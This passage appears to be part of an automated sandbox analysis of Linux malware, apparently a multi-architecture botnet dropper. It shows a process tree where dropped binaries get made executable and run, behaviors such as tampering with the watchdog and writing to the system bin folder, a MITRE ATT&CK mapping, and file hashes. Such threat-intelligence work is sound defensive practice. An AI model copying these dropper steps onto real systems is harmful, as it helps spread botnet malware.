  chmod +x config-err-TtKvLo netplan_vobrtjej ohshit.sh oqweoqeqq snap-private-tmp ssh-JySJrCXnpUjQ systemd-private-f3b2925203a9410e894de291d4e50eed-colord.service-PHQP6p systemd-private-f3b2925203a9410e894de291d4e50eed-ModemManager.service-LA7w9n systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-resolved.service-1HmCWO systemd-private-f3b2925203a9410e894de291d4e50eed-systemd-timedated.service-JBGpC1 uqwodquojqoqdo.arc uqwodquojqoqdo.arm uqwodquojqoqdo.arm5 uqwodquojqoqdo.arm6 uqwodquojqoqdo.arm7 uqwodquojqoqdo.i468 uqwodquojqoqdo.i686 uqwodquojqoqdo.m68k uqwodquojqoqdo.mips uqwodquojqoqdo.mpsl uqwodquojqoqdo.ppc uqwodquojqoqdo.sh4 uqwodquojqoqdo.spc uqwodquojqoqdo.x86 uqwodquojqoqdo.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1646
- /tmp/oqweoqeqq
  ./oqweoqeqq
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:1647

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/uqwodquojqoqdo.x86

Filesize
20KB

MD5
313c4b235e0e62ca38eb04bfa7677e44

SHA1
c31d5d0c0fa4bfa4ea2837cede424504c68ccfd3

SHA256
dfd6f81327b03f5336895c6bed7bfff178a054eafef5637ccb74e7a0ac4ef4c4

SHA512
0bf52b087e48b6daac55f735ae5b5af7626322db3200e72c61755d6b80234c503a02f3e35b340b70d1731fdec2054f530251504dec55497ca5877f9233ff54ad

Download Submit